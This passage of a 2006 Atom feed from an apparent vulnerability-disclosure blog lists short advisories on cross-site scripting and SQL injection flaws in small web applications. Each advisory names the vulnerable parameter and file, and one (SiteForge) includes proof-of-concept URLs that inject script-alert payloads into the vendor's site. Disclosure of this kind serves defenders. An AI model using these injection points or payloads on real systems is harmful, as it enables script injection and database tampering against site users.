/&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115072260958850142?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115072260958850142/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115072260958850142' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115072260958850142'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115072260958850142'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/phpmydirectory-xss-vuln.html' title='phpMyDirectory XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115063999442338899</id><published>2006-06-18T16:12:00.000+02:00</published><updated>2007-03-23T04:46:59.346+01:00</updated><title type='text'>Sharky e-shop XSS</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 18 june 2006&lt;br /&gt;vendor:http://www.lombar.net/shop/main.asp&lt;br /&gt;affected versions:3.05 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Sharky e-shop contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "maingroup","secondgroup" parameter in "search_prod_list.asp" and input passed to the "maingroup" parameter in "meny2.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115063999442338899?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115063999442338899/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115063999442338899' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115063999442338899'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115063999442338899'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/sharky-e-shop-xss.html' title='Sharky e-shop XSS'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115063854102284891</id><published>2006-06-18T15:48:00.000+02:00</published><updated>2007-03-23T04:47:02.006+01:00</updated><title type='text'>The Edge eCommerce Shop XSS</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 18 june 2006&lt;br /&gt;vendor:https://www.theedgeshop.com/index.html&lt;br /&gt;affected versions:last &lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;The Edge eCommerce Shop contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "cart_id" parameter in "productDetail.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115063854102284891?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115063854102284891/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115063854102284891' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115063854102284891'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115063854102284891'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/edge-ecommerce-shop-xss.html' title='The Edge eCommerce Shop XSS'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115063677742203881</id><published>2006-06-18T15:18:00.000+02:00</published><updated>2007-03-23T04:46:00.506+01:00</updated><title type='text'>Tradingeye Shop R4 XSS</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 18 june 2006&lt;br /&gt;vendor:http://www.dpivision.com/&lt;br /&gt;affected versions:R4 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Tradingeye Shop contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "image" parameter in "details.cfm" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115063677742203881?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115063677742203881/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115063677742203881' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115063677742203881'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115063677742203881'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/tradingeye-shop-r4-xss.html' title='Tradingeye Shop R4 XSS'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115063499931037277</id><published>2006-06-18T14:49:00.000+02:00</published><updated>2006-06-18T14:49:59.403+02:00</updated><title type='text'>tplShop v 2.0 vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 18 june 2006&lt;br /&gt;vendor:http://www.tpl-design.com/tplshop/&lt;br /&gt;affected versions:V 2.0 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;tplShop contains a flaw that allows a remote sql injection attacks.Input passed to the "first_row" parameter in "category.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115063499931037277?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115063499931037277/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115063499931037277' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115063499931037277'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115063499931037277'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/tplshop-v-20-vuln.html' title='tplShop v 2.0 vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115063277783945562</id><published>2006-06-18T14:12:00.000+02:00</published><updated>2006-11-06T01:55:12.430+01:00</updated><title type='text'>xarancms V2.0 vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 18 june 2006&lt;br /&gt;vendor:www.xaran.de/html/xaran_xarancmsV2.0.php&lt;br /&gt;affected versions:V2.0 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;xarancms contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "xarancms_haupt.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115063277783945562?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115063277783945562/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115063277783945562' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115063277783945562'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115063277783945562'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/xarancms-v20-vuln.html' title='xarancms V2.0 vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115038049836614556</id><published>2006-06-15T16:07:00.001+02:00</published><updated>2006-10-27T18:11:19.986+02:00</updated><title type='text'>SiteForge Collaborative Development Platform XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 15 june 2006&lt;br /&gt;vendor:http://www.sitelliteforge.com/&lt;br /&gt;affected versions:1.0.4 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;SiteForge Collaborative Development Platform contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "_status","_extra1","_extra2","_extra3" paramters isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;examples:&lt;br /&gt;&lt;br /&gt;http://www.sitelliteforge.com/index/siteforge-bugs-action&lt;br /&gt;/proj.siteforge?proj=siteforge&amp;_status=%3Cscript%3Ealer&lt;br /&gt;t('r0t')%3C/script%3E&lt;br /&gt;&lt;br /&gt;http://www.sitelliteforge.com/index/siteforge-bugs-action&lt;br /&gt;/proj.siteforge?proj=siteforge&amp;_extra1=%3Cscript%3Ealert(&lt;br /&gt;'r0t')%3C/script%3E&lt;br /&gt;&lt;br /&gt;http://www.sitelliteforge.com/index/siteforge-bugs-action/&lt;br /&gt;proj.siteforge?proj=siteforge&amp;_extra1=&amp;_extra3=%3Cscript%3&lt;br /&gt;Ealert('r0t')%3C/script%3E&lt;br /&gt;&lt;br /&gt;http://www.sitelliteforge.com/index/siteforge-bugs-action/&lt;br /&gt;proj.siteforge?proj=siteforge&amp;_extra1=&amp;_extra3=&amp;_extra2=%3&lt;br /&gt;Cscript%3Ealert('r0t')%3C/script%3E&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115038049836614556?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115038049836614556/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115038049836614556' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115038049836614556'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115038049836614556'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/siteforge-collaborative-development_15.html' title='SiteForge Collaborative Development Platform XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115037569472330879</id><published>2006-06-15T14:47:00.000+02:00</published><updated>2006-06-15T14:48:14.863+02:00</updated><title type='text'>Virtual War multiple SQL inj. vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 15 june 2006&lt;br /&gt;vendor:http://www.vwar.de/&lt;br /&gt;affected versions:v1.5.0 R14 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Virtual War contains a flaw that allows a remote sql injection attacks.Input passed to the "s","showgame","sortorder","sortby" parameters in "war.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115037569472330879?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115037569472330879/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115037569472330879' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115037569472330879'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115037569472330879'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/virtual-war-multiple-sql-inj-vuln.html' title='Virtual War multiple SQL inj. vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115037470940461053</id><published>2006-06-15T14:31:00.000+02:00</published><updated>2006-06-15T14:31:49.650+02:00</updated><title type='text'>openCI SQL inj.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 15 june 2006&lt;br /&gt;vendor:http://www.openci.info/&lt;br /&gt;affected versions: v.1.0 BETA 0.20.1  and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;openCI contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "index.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Upgrade to v.1.0 BETA 0.30.0&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115037470940461053?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115037470940461053/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115037470940461053' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115037470940461053'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115037470940461053'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/openci-sql-inj.html' title='openCI SQL inj.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115037227861397479</id><published>2006-06-15T13:50:00.001+02:00</published><updated>2007-01-12T16:41:15.256+01:00</updated><title type='text'>SSPwiz XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 15 june 2006&lt;br /&gt;vendor:http://www.sspwiz.com/&lt;br /&gt;affected versions:SSPwiz Plus 1.0.7 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;SSPwiz contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "message" parameter in "index.cfm" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115037227861397479?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115037227861397479/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115037227861397479' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115037227861397479'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115037227861397479'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/sspwiz-xss-vuln.html' title='SSPwiz XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115037224386905939</id><published>2006-06-15T13:50:00.000+02:00</published><updated>2006-06-20T02:40:12.030+02:00</updated><title type='text'>iPostMX 2005 vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 15 june 2006&lt;br /&gt;vendor:http://www.ipostmx.com/&lt;br /&gt;affected versions:2.0 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;iPostMX 2005 contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "RETURNURL" parameter in "userlogin.cfm" and "account.cfm" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115037224386905939?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115037224386905939/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115037224386905939' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115037224386905939'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115037224386905939'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/ipostmx-2005-vuln.html' title='iPostMX 2005 vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115037221011958284</id><published>2006-06-15T13:49:00.001+02:00</published><updated>2006-06-15T13:50:10.220+02:00</updated><title type='text'>aXentForum II XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 15 june 2006&lt;br /&gt;vendor:http://www.axent.us/axentforum.cfm&lt;br /&gt;affected versions:aXentForum II and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;aXentForum II contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "startrow" parameter in "viewposts.cfm" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115037221011958284?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115037221011958284/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115037221011958284' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115037221011958284'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115037221011958284'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/axentforum-ii-xss-vuln.html' title='aXentForum II XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115037217752760264</id><published>2006-06-15T13:49:00.000+02:00</published><updated>2006-06-15T13:49:37.646+02:00</updated><title type='text'>aXentGuestbook I.I XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 15 june 2006&lt;br /&gt;vendor:http://www.axent.us/axentguestbook.cfm&lt;br /&gt;affected versions:aXentGuestbook I.I and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;aXentGuestbook contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "startrow" parameter in "guestbook.cfm" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115037217752760264?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115037217752760264/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115037217752760264' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115037217752760264'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115037217752760264'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/axentguestbook-ii-xss-vuln.html' title='aXentGuestbook I.I XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115037214640342982</id><published>2006-06-15T13:48:00.000+02:00</published><updated>2006-06-15T13:49:06.680+02:00</updated><title type='text'>LivingDot Photos XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 15 june 2006&lt;br /&gt;vendor:http://photoblog.livingdot.com/&lt;br /&gt;affected versions:latest and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;LivingDot Photos contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "page" parameter in "comment.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115037214640342982?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115037214640342982/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115037214640342982' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115037214640342982'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115037214640342982'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/livingdot-photos-xss-vuln.html' title='LivingDot Photos XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115020245677883686</id><published>2006-06-13T14:40:00.000+02:00</published><updated>2007-03-25T15:53:24.806+02:00</updated><title type='text'>EvGenius Counter XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 13 june 2006&lt;br /&gt;vendor:http://counter.evgenius.net/&lt;br /&gt;affected versions:3.4 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;EvGenius Counter contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "page" parameter in "monthly.php" and "daily.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br 